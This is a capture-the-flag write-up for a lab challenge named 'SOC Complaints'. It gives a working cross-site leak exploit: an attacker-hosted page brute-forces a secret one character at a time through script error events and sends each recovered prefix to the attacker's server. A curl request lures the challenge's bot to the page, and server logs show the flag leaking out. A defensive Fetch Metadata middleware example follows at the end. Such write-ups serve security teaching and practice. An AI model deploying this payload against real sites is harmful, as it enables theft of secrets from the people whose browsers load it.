# SOC Complaints

**IPAddress** 172.20.0.4\
**Port** 80\
**URL** <http://172.20.0.4/>

## Description

If you cannot access a website, submit a complaint to the SOC team and they will investigate.

## Structure

```
.
├── app.js
├── config
│   └── cors.js
├── controllers
│   ├── complaints.js
│   └── manage.js
├── middlewares
│   └── error.js
├── package.json
├── routes
│   ├── complaints.js
│   └── manage.js
├── utils
│   ├── browser.js
│   └── database.js
└── views
```

## Solution

### Exploit

#### Attacker IPAddress

```bash
ip addr show docker0
```

```bash
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:40ff:fe01:c8b5/64 scope link 
       valid_lft forever preferred_lft forever
```

IPv4: **172.17.0.1**

#### Start a web server on the docker interface with Python

```bash
python3 -m http.server 80 -b 172.17.0.1
```

#### Content of index.html

```html
<html>
    <head>
        <title>EXPLOIT</title>
    </head>
    <body>
        <script>
            var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^`{|}~';
            var counter = 0;
            var secret = '';

            probeError = (url) => {
                let script = document.createElement('script');
                script.src = url;
                script.onload = async () => { 
                    secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
                    await fetch(`http://172.17.0.1/${secret}`);
                    counter = 0;
                    
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                script.onerror = () => {
                    counter = counter + 1;
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                document.head.appendChild(script);
            }
            probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);

        </script>
    </body>
</html>
```

#### Phish the SOC team

```bash
curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
```

```json
{"message":"your request was successfully submitted"}
```

#### Flag

```bash
└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -
```

### Explanation

* [Error Events](https://xsleaks.dev/docs/attacks/error-events/)
* [Leaky Images: Targeted Privacy Attacks in the Web](https://www.usenix.org/system/files/sec19fall_staicu_prepub.pdf)
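
The error-event oracle described in the links above works because a cross-site page can tell whether a `<script>` load of the secrets endpoint succeeded or failed, which CORS does not prevent. A server-side mitigation is sketched below as an added example, not the challenge's own code. The function names are hypothetical, and it assumes the application is served over HTTPS, since browsers only attach `Sec-Fetch-*` headers to requests for trustworthy origins.

```javascript
// Added example (not the challenge's code). Function names are hypothetical.
// Sec-Fetch-* and Cross-Origin-Resource-Policy are standard header names.

// Returns true when the request may reach a sensitive API handler.
// `req` needs `method` and lower-cased `headers`, as in Node's http module.
function isAllowedByFetchMetadata(req, { allowNavigation = false } = {}) {
    const site = req.headers['sec-fetch-site'];
    const mode = req.headers['sec-fetch-mode'];
    const dest = req.headers['sec-fetch-dest'];

    // No Fetch Metadata (non-browser client, old browser, plain-HTTP origin):
    // nothing to judge here, so authentication has to gate the request.
    if (site === undefined) return true;

    // Same-origin, same-site and user-initiated requests (address bar, bookmark).
    if (['same-origin', 'same-site', 'none'].includes(site)) return true;

    // Optionally permit cross-site top-level GET navigations (pages, not APIs).
    if (allowNavigation && mode === 'navigate' && req.method === 'GET' &&
        !['object', 'embed'].includes(dest)) return true;

    // Remaining case: cross-site subresource load such as <script src> or <img>.
    return false;
}

// Express-style middleware: every response carries CORP, and every rejected
// cross-site load gets the same 403 whatever the query string contained.
function fetchMetadataGuard(req, res, next) {
    res.setHeader('Cross-Origin-Resource-Policy', 'same-origin');
    if (isAllowedByFetchMetadata(req)) return next();
    res.statusCode = 403;
    res.end();
}

// Constructed sample requests (not captured traffic).
const crossSiteScriptLoad = {
    method: 'GET',
    headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'script' },
};
const sameOriginFetch = {
    method: 'GET',
    headers: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty' },
};

console.log('cross-site <script> load allowed:', isAllowedByFetchMetadata(crossSiteScriptLoad));
console.log('same-origin fetch allowed:', isAllowedByFetchMetadata(sameOriginFetch));
```

Because the guard rejects the request before the handler compares anything, a correct and an incorrect guess produce the same response, and the `Cross-Origin-Resource-Policy` header makes the browser block the cross-origin load even where Fetch Metadata is not sent.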


